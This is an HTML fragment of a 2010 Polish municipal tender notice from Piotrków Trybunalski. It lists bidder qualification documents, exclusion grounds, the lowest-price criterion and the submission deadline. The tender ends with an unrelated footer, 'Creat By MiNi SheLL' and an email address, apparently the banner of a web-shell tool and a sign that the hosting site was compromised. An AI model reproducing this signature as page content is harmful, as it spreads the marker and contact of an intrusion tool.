<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1.
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kseropię potwierdzoną przez notariusza).
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza).
4.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 6.
5.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2.
6. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ww. ustawy. W przypadku podmiotów występujących wspólnie odpis składa każdy z nich.
7.	Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 5.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Rudowskiego 10
97-300 Piotrków Trybunalski
pokój 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2010 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Rudowskiego 10
97-300 Piotrków Trybunalski
pokój 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com